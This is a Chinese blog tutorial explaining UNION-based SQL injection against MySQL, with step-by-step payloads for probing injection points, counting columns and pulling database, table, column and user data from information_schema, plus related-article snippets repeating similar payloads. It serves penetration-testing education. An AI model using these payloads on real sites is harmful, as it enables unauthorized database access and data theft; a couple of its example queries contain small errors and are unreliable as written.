简单讲解SQL注入中union注入

最新推荐文章于 2024-07-16 14:51:49 发布
最新推荐文章于 2024-07-16 14:51:49 发布
阅读量1.1k 收藏 7
点赞数 1
分类专栏: SQL注入 union注入 网络安全渗透测试 文章标签: 安全 mysql 数据库 服务器 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mittsommer/article/details/105384667
版权

与SQL注入相关的知识点

在讲解union注入之前先说一说与SQL注入相关的知识点(选自博主学习注入的笔记):在Mysql5.0版本以后,会存在一个默认的名为information_schema的数据库,在这个数据库内有三个重要的表需要记住:SCHEMATA、TABLES、COLUMNS,其中,SCHEMA表中存储着用户创建的所有数据库的名字,名字存于该表中的SCHEMA_NAME字段中。而TABLES表存储着用户创建的所有库名和表名,存储库名的字段是:TABLE_SCHEMA, 存储所有表名的字段是:TABLE_NAME,而COLUMNS表存储着用户创建的所有库名、表名、字段名,这三个数据分别存储于:TABLE_SCHEMA,TABLE_NAME,COLUMNS_NAME这三个字段。

常用语句

当不知道任何条件时,可以用如下语句进行查询:

SELECT 字段名 FROM 库名.表名

当只知道一个条件时,可用如下语句进行查询:

SELECT 字段名 FROM 库名.表名 WHERE 已知条件='value'

当知道两个条件时,可用如下语句查询:

SELECT 字段名 FROM 库名.表名 WHERE 条件1='value' AND 条件2='value'

limit:limit语句格式为:

limit m,n

m指的是语句开始的位置,n指的是取n条记录,该语句一般在注入时配合SELECT使用。

其他函数

这里需要记住三个函数:

database()         #返回当前网站使用的数据库
version()          #返回当前MySQL版本
user()             #返回当前MySQL用户

union注入攻击

下面废话少说,开始介绍本文的主题:SQL注入中的union注入,另外,本文提及的技术不可以用于任何非法用途
要想注入首先需要判断是否存在注入点:
例如有某网站地址为:http://xxx.xx.xx.x/xxxxid=1
则判断是否存在注入点的方法如下:
先访问该网址,看网站返回的结果.例如(只是打比方)返回的值是1,这是,将id的值加上一个英文状态下的单引号,就是’
假设这时返回的值与id=1时不同(咳咳,对于union注入的靶机我没找到,所以呢,先用假设法完成该文章,等后面的其他类型注入我试着找找靶机,配上图片,不然,这篇文章写下来尴尬症都要犯了),这时,我们再访问http://xxx.xx.xx.x/xxxxid=1 and 1=1
这里and 1=1为真,正常情况下页面返回的结果应当与id=1时相同
这时,我们再访问http://xxx.xx.xx.x/xxxxid=1 and 1=2
这时and 1=2为假,页面应返回与id=1不同的结果
从以上步骤可以简单判断出该网站可能存在注入漏洞,接着使用order by查询字段数量,order by 用法大概如下:这个地方还得用举例法:http://xxx.xx.xx.x/xxxxid=1 order by 1-99
这里1-99为随意的一个数,如果返回页面与id=1相同则字段数应该大于等于这个数,如果与id=1不同,则字段数应该小于这个数
然后则可以进行下一步:这里继续假设字段数为3
则下一步应该访问http://xxx.xx.xx.x/xxxxid=1 union select 1,2,3这时会返回与id=1相同的结果或者无内容,是因为他只执行了第一条语句,这里我们访问:http://xxx.xx.xx.x/xxxxid=-1 union select 1,2,3
这里我们继续假设页面返回2,3 这个返回结果则说明在2,3处可以插入SQL语句
然后,就可以获取信息了:我们执行这一步:

2/3 处插入:database() 整个语句:union select 1,database(),3  
#返回数据库名称,下一步我们查询表名
这里在2/3处插入如下语句:
select table_name from information_schema.tables where table_schema='sql' limit 0,1
#上面的语句中的table_schema='sql'的前提是数据库名为sql,执行过后,会返回第一个表的名称,如果想查看第二个表,则将limit 0,1改为limit 1,1 以此类推
#接下来我们来查询字段名,语句如下:
select columns from information_schema.columns where table_schema='sql' and table_name='users' limit 01
#上述语句中,我们假设要查询字段的库名和表名分别为:sql、users
#我们假设接下来想要查询的字段名为user_name,语句如下
select user_name from sql.users limit 0,1
#这里我们就利用union注入获取了数据

到这里,本文章对于SQL注入中的union注入的介绍与讲解就结束了,对于union注入有任何问题可以在评论区发表,如有不足请评论区友善交流,本文章纯手打!!下一篇有关于渗透测试的文章如果不出计划的话是Boolean注入,本文章介绍的union注入是最简单的,这种注入也不常见,但是也要再次说明:所有技术请勿用于非法用途
网络安全法规定:禁止侵入他人网络、干扰正常功能等,如想练习技术请找靶机

Rf..
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9629
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
SQL注入——联合查询union
Cwillchris的博客
06-02 480
SQL注入之联合查询超详细原理讲解
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 909
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
SQL注入union联合注入的详解
最新发布
m0_57836225的博客
07-16 234
当应用程序在构建 SQL 查询时,将用户输入未经充分验证和清理就直接拼接到查询语句,如果原始查询语句预期返回一个结果集,而攻击者通过构造恶意的输入,利用 UNION 操作符添加额外的查询部分,就能够将其他原本不应出现在当前查询的数据合并到结果集,从而达到获取敏感数据或执行未授权操作的目的。2. 确定字段数量:通过尝试不同数量的列,观察服务器的响应,以确定原始查询选择的字段数量,以便在注入UNION 查询提供相同数量的列。// 模拟用户输入,此处存在漏洞。
sql注入--2union注入
技术骨干小李的博客
07-14 295
union注入的初步认识
Union注入
shenzhang7331的博客
11-18 216
1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段 2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3 3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_sch...
union注入
weixin_43858799的博客
04-01 519
一、union注入 基于union的信息获取: union联合查询:可以通过联合查询查询指定的数据 用法举例: select username,password from user where id =1 union select 字段1,字段2 from 表名 先登入PHPmyadmin 进入pikachu的数据库 得到此结果 上述为一般查询 union查询: 除了通过遍历查询数...
sql注入讲解ppt.pptx
08-10
4. 操作方便:SQL 注入攻击可以通过简单输入来实现,攻击者可以使用自动化工具来快速实现攻击。 二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL ...
SQL注入漏洞讲解
02-02
**SQL注入**是一种常见的Web安全漏洞,它允许攻击者将恶意SQL代码插入到应用程序的数据输入字段,从而执行未授权的操作,例如读取或修改数据库的数据。SQL注入的危害巨大,可能导致敏感数据泄露、系统功能滥用...
sql注入之手工注入示例详解
09-10
本文将深入讲解如何进行手工SQL注入,以帮助读者理解和掌握这个过程。 首先,我们需要识别注入点,即用户输入能够影响到SQL查询的地方。例如,在URL的"id"参数(http://localhost/sqlilabs/Less-2/?id=1)就是一...
php简单实现sql注入的方法
12-18
在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过输入恶意的SQL代码,欺骗服务器执行非预期的操作,从而获取敏感信息或破坏数据库。对于PHP开发者来说,防止SQL注入是构建安全网站的重要一环。本文将详细...
sql注入实战—union注入
qq_40909772的博客
07-12 781
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
SQL注入-union注入
july07070707的博客
05-10 6171
联合注入
qq_35191331的博客
08-16 985
题目连接:http://103.238.227.13:10087/ //过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','li
union联合注入
m0_60945802的博客
03-21 4903
union联合注入
SQL---Union联合注入
Z11762的博客
04-01 1051
union函数是。
SQL注入攻击详解与防御策略
"该PDF文件主要讲解SQL注入的基础知识,包括原理、分类、注入技巧以及在MySQL的应用,还提供了靶场练习,涵盖了数字型、字符型、搜索型和盲注型注入的实战步骤。" SQL注入是一种常见的网络安全漏洞,攻击者通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rf..

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值